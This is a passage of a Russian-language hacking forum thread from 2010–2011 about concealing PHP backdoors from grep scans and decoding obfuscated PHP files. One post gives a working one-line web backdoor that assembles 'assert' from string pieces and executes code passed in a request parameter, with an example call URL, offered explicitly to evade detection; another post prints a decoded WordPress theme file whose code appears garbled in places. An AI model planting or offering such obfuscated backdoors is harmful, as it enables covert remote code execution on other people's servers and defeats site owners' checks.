Старый 12.07.2010, 16:04   #21
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Например так (стандартные грепами не выловишь + нет зависимостей (пока)):
PHP код:
<?php $a='phpinfo';${'a'}();?>
Pashkela вне форума   Ответить с цитированием
Старый 12.07.2010, 16:17   #22
tipsy
 
Аватар для tipsy
 
Регистрация: 10.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Pashkela, то-ли я тебя не понял, то-ли ты невнимательно читал мой пост.
curly syntax (пример, который ты привёл) не работает с eval()

На практике это приводит к проблемам: grep по каталогу с сайтом покажет бэкдор, который использует eval.

Знатоки синтаксиса php, подскажите. Может можно как-то закодировать символ, или разорвать имя функции?
Перепробовал уже массу вариантов, максимум, до чего мне удалось додуматься, это evaL
tipsy вне форума   Ответить с цитированием
Старый 12.07.2010, 16:37   #23
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

2 tipsy:
PHP код:
<?php $b="ass"."ert";$a=$b($_REQUEST['e']);${'a'};?>
пример вызова:

Код:
http://localhost/user5.php?e=phpinfo();
ну скажем так eval не единственный вариант, плюс децл фантазии - и спрячешь от grep всё что угодно
Pashkela вне форума   Ответить с цитированием
Старый 12.07.2010, 17:26   #24
tipsy
 
Аватар для tipsy
 
Регистрация: 10.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Спасибо, это как раз то, что я искал. Ура.
tipsy вне форума   Ответить с цитированием
Старый 14.07.2010, 14:51   #25
lisa99
 
Регистрация: 06.07.2010
Сообщений: 11
Репутация: 0
По умолчанию

Цитата:
Сообщение от elwaux Посмотреть сообщение
lisa99:
поискал в гугле, нашел твою ф-цию:
...
все
какой ты исполнительный
я специально не стала полный текст приводить, чтобы никого не напрягать.
Ну ничего, будет мне персональным уроком (ну и другим тоже).
Пару нюансов я упустила, как я понимаю теперь, ..глядя на твой образцовый код
lisa99 вне форума   Ответить с цитированием
Старый 15.07.2010, 18:26   #26
Serafim
 
Аватар для Serafim
 
Регистрация: 06.07.2010
Сообщений: 21
Репутация: 1
По умолчанию

Цитата:
Сообщение от Serafim Посмотреть сообщение
elwaux:
Пробовал уже через принт после дезенда, ничего не получилось.
Вот чистый .bin файл без дезенда.
Все еще актуально.
Serafim вне форума   Ответить с цитированием
Старый 15.07.2010, 19:08   #27
Dr.TRO
 
Аватар для Dr.TRO
 
Регистрация: 06.07.2010
Сообщений: 90
Репутация: 21
По умолчанию

Serafim, по моему то лицензия (теоретический пруфлинк) а не зендовое так что соль в тех кодах, в первых постах описано как оприятить вид, так что каждую переменную хоть как-то умнее попробуй назвать в пхп-ных файлах и ищи соль там.
__________________
http://fc01.deviantart.net/fs48/f/20...eyecixramd.png
http://img156.imageshack.us/img156/2...userbartd7.png
Цитата:
root@rdot.org ~ # perl -MAcme::BadExample
Dr.TRO вне форума   Ответить с цитированием
Старый 21.02.2011, 14:45   #28
akaramazov
 
Регистрация: 21.02.2011
Сообщений: 3
Репутация: 0
По умолчанию

Помогите пожалуйста расшифровать данный файл.
В нем php-код типа: <?php if (!function_exists("T7FC56270E7A70FA81A5935B72EACBE 29"))...

http://zalil.ru/30541336
akaramazov вне форума   Ответить с цитированием
Старый 21.02.2011, 14:48   #29
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

akaramazov
PHP код:
<?php  function the_trend_categories ($echo=true){   $post_cat get_the_category();   if (is_array($post_cat)):    foreach ($post_cat as $npc):     $list_tc[] = $npc->cat_name;    endforeach;   endif;   if ($echo):    echo $list_tc[0];   else:    return $list_tc[0];    endif;  }    function blogname (){   $blogname get_bloginfo("name");   $exp explode(" "$blogname);   $tot count($exp);   $lastword end($exp);   $left implode(" "array_slice($exp,0count($exp)-1));   echo $left " <span>" $lastword "</span>";  }    function remove_more_link($content) {    global $post;   $match preg_match('/<a href="(.+)" class="more-link">(.+)/i'$content$matches);   if ($match) {    $ret_data str_replace($matches[0], '</p>'$content);    if (show_post_image()):     return $ret_data '<a href="' $matches[1] . '" class="more-links" id="readmore-post-' $post->ID '" title="Read More">Read More</a>';    else:     return $ret_data ;    endif;   }   return $content;  }  add_filter('the_content''remove_more_link');    function show_post_image(){   global $post;   $showImage get_post_meta($post->ID"show-image"true);   if ($showImage=="false")    return false;       return true;  }    function the_tab_image ($w=82$h=57$def "No Image Found"$key='image'){   global $post;   $image get_post_meta($post->ID$keytrue);   $g blogdir "thumb.php?src=" $image "&amp;h=$h&amp;w=$w&amp;zc=1&amp;q=100&amp;nmT=" $def;   echo $g;  }    function the_short_title($limit=26$echo=1$title=''){   if (empty($title)){    $title strip_tags(the_title('','',false));   }   if (strlen($title)<=$limit){   }else{    $title strip_tags(substr_replace(the_title('','',false),' ...',$limit));   }   if ($echo==1){    echo $title;   }else{    return $title;   }  }    function substr_ellipse($str$len) {   if(strlen($str) > $len) {    $str substr($str0$len-3) . "...";   }   return $str;  }      function the_new_excerpt($limit=100){   echo substr_ellipse(get_the_excerpt(), $limit);   }    function wp_list_pages_tweak ($actions 'title_li=&echo=0'){      $pages wp_list_pages ($actions);   $pages_array preg_split('/\n/'$pages);   $count count($pages_array);   $i 0;   while ( $i $count ) {          $eo .= preg_replace('/<li (.+)>(.+)/i''<li $1>'$category_array[$i]) . "\n";          $i++;   }   echo '<!--Pages Tweak-->' $eo '<!--/Pages Tweak-->';  }      function the_list_categories_tweak ($categories){   $category_array preg_split('/\n/'$categories);   $count count($category_array);   $i 0;   while ( $i $count ) {          if ( preg_match('/<ul class=(\'|")children(\'|")/i'$category_array[$i+1]) ) {           $eo .= preg_replace('/<li class=(\'|")(.+)(\'|")>/i''<li class=$1has-child $2$3>'$category_array[$i]) . "\n";          } else {              $eo .= $category_array[$i] . "\n";          }          $i++;   }   return '<!--Categories Tweak-->' $eo '<!--/Categories Tweak-->';  }  add_action ('wp_list_categories''the_list_categories_tweak');    add_action ('wp_footer''wp_footer_tweak');  function wp_footer_tweak (){  ?>
                        <div class="clear"></div>
                    </div>
                </div>
            </div>
        </div>
        
        <div class="footAdsense"></div>
        <div class="copyright">&copy; Copyright <?php echo date("Y");?> <a href="<?php echo get_option('home'); ?>/"  title="<?php bloginfo('name'); ?>"><?php bloginfo('name'); ?></a>. All Rights Reserved | Designed by <a href="http://themes.rock-kitty.net/" title="FREE Wordpress Themes" target="_blank">FREE Wordpress Themes</a> and <a href="http://www.jennings-ford.co.uk/usedsales/summary/fordfocus.aspx" title="Ford Focus for Sale" target="_blank">Ford Focus for Sale</a></div>
    </div>

</div>

<script type="text/javascript" src="<?php echo blogdir;?>js/functions.js"></script>
<script type="text/javascript" src="<?php echo blogdir;?>js/HandelGothicEF.js"></script>
<script type="text/javascript" src="<?php echo blogdir;?>js/football.js"></script>
<?php  }    $rpt = array (2,4,6,8,10);    function blog_setting_warning() {   $theme_settings get_option"blogsetings" );   if ( is_admin() && !is_array($theme_settings) ) {    echo "    <div id='theme-warning' class='updated fade'><p><strong>".__('Theme is not configured yet.')."</strong> ".sprintf(__('You must <a href="%1$s">configure this theme</a> for it to work.'), "themes.php?page=blog-options")."</p></div>    ";   }  }  add_action('admin_notices''blog_setting_warning');    add_action('admin_init''register_theme_settings');  function register_theme_settings() {         $theme_settings $_REQUEST['blogsetings'];   $page $_GET['page'];   $action $_REQUEST['action'];      if ( $page == "blog-options" ) {    if ( 'Save Settings' == $action ) {     update_option"blogsetings"$theme_settings);     header("Location: themes.php?page=blog-options&saved=true");     die();    }elseif ( 'Reset Settings' == $action ) {     delete_option"blogsetings");      header("Location: admin.php?page=blog-options&reset=true");     die();    }   }     }          function theme_options_css_js() {  ?>
<style type="text/css">
    .metabox-holder { 
        width: 350px; float: left;
        margin: 0px; padding: 0px 10px 0px 0px;
    }
    .metabox-holder .postbox .inside {
        padding: 0px 10px 0px 10px;
    }
    .catOptions { width:100%; height:184px!important; }
    .catOption { width:100%; height:132px!important; }
</style>
<?php  }          function sp_add_custom_box() {   if( function_exists'add_meta_box' )) {        add_meta_box'sp_custom_box_sp'"Post Settings"'sp_inner_custom_box_spanish''post''normal''high' );       }  }    function sp_inner_custom_box_spanish() {   global $post;   echo '<script language="javascript">jQuery("form#post").attr("enctype","multipart/form-data");</script>';      echo '<input type="hidden" name="sp_noncename" id="sp_noncename" value="' .    wp_create_nonceplugin_basename(__FILE__) ) . '" />';      echo '<p><label for="_nov"><strong>No of Visits: </strong></label></p>';   echo '<textarea style="width: 95%;height: 25px;" id="_nov" name="_post-counter">' get_post_meta($post->ID'post-counter'true) . '</textarea><br /><br />';         echo '<p><label for="_featured_title"><strong>Show Image?<br /></strong></label></p>';   echo '<select style="width: 95%;height: 25px;" name="_show-image">';   echo '<option value="true"';   echo get_post_meta($post->ID'show-image'true)=="true"?" selected=\"selected\"":"";   echo '>Yes</option>';   echo '<option value="false"';   echo get_post_meta($post->ID'show-image'true)=="false"?" selected=\"selected\"":"";   echo '>No</option>';   echo '</select><br /><br />';  }      function sp_save_postdata($post_id$post) {         if ( !wp_verify_nonce$_POST['sp_noncename'], plugin_basename(__FILE__) )) {   return $post->ID;   }        if ( 'page' == $_POST['post_type'] ) {    if ( !current_user_can'edit_page'$post->ID ))    return $post->ID;   } else {    if ( !current_user_can'edit_post'$post->ID ))    return $post->ID;   }                    $mydata['post-counter'] = $_POST['_post-counter'];   $mydata['show-image'] = $_POST['_show-image'];            foreach ($mydata as $key => $value) {     if( $post->post_type == 'revision' ) return;     $value implode(',', (array)$value);     if(get_post_meta($post->ID$keyFALSE)) {      update_post_meta($post->ID$key$value);    } else {      add_post_meta($post->ID$key$value);    }    if(!$valuedelete_post_meta($post->ID$key);    }    }        add_action('admin_menu''sp_add_custom_box');  add_action('save_post''sp_save_postdata'12);   ?>
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Старый 21.02.2011, 14:58   #30
akaramazov
 
Регистрация: 21.02.2011
Сообщений: 3
Репутация: 0
По умолчанию

@oRb

огромнейшее спасибо!!! а то я уже 3-й день мучаюсь ище по всем форумам, как расшифровать.
akaramazov вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot